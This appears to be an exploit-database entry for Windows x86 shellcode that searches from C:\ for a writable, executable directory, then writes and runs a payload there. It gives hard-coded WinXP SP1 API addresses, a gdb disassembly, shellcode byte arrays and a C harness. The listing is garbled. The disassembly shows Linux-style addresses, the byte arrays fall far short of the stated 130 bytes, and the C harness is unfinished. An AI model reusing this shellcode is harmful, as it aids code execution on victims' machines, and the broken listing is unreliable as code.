Windows/x86 - Executable Directory Search Shellcode (130 bytes)

ID 1337DAY-ID-27143
Type zdt
Reporter Krzysztof Przybylski
Modified 2017-02-27T00:00:00


Exploit for win32 platform in category shellcode

                                            # Title: Windows x86 - Executable directory search Shellcode (130 bytes)
# Date: 26-02-2017
# Author: Krzysztof Przybylski
# Platform: Win_x86
# Tested on: WinXP SP1
# Shellcode Size: 130 bytes
write & exec dir searcher
starts from C:\
If dir found then write, execute (ping and exit
If Write/noexec dir found then continue
Tested on WinXP SP1 (77e6fd35;77e798fd)
i686-w64-mingw32-gcc shell.c -o golddgger.exe
Null-free version:
(gdb) disassemble 
Dump of assembler code for function function:
=> 0x08048062 <+0>:    pop    ecx
   0x08048063 <+1>:   xor    eax,eax
   0x08048065 <+3>:   mov    BYTE PTR [ecx+0x64],al
   0x08048068 <+6>:   push   eax
   0x08048069 <+7>:   push   ecx
   0x0804806a <+8>:   mov    eax,0x77e6fd35
   0x0804806f <+13>:  call   eax
   0x08048071 <+15>:  xor    eax,eax
   0x08048073 <+17>:  push   eax
   0x08048074 <+18>:  mov    eax,0x77e798fd
   0x08048079 <+23>:  call   eax
NULL-free shellcode (132 bytes):
"\x35\xfd\xe6\x77"                      // exec
"\xfd\x98\xe7\x77"                      // exit
"\x63\x3a\x5c"                          // C:\
"\x31\x37\x32\x2e\x31\x2e\x31\x2e\x31"  //
// NULL version (130 bytes):
char code[] = 
"\x35\xfd\xe6\x77"                  // exec
"\xfd\x98\xe7\x77"                      // exit
"\x63\x3a\x5c"                          // C:\
"\x31\x37\x32\x2e\x31\x2e\x31\x2e\x31"  // 
int main(int argc, char **argv)
        int (*func)();
        func = (int (*)()) code;

# [2018-04-11]  #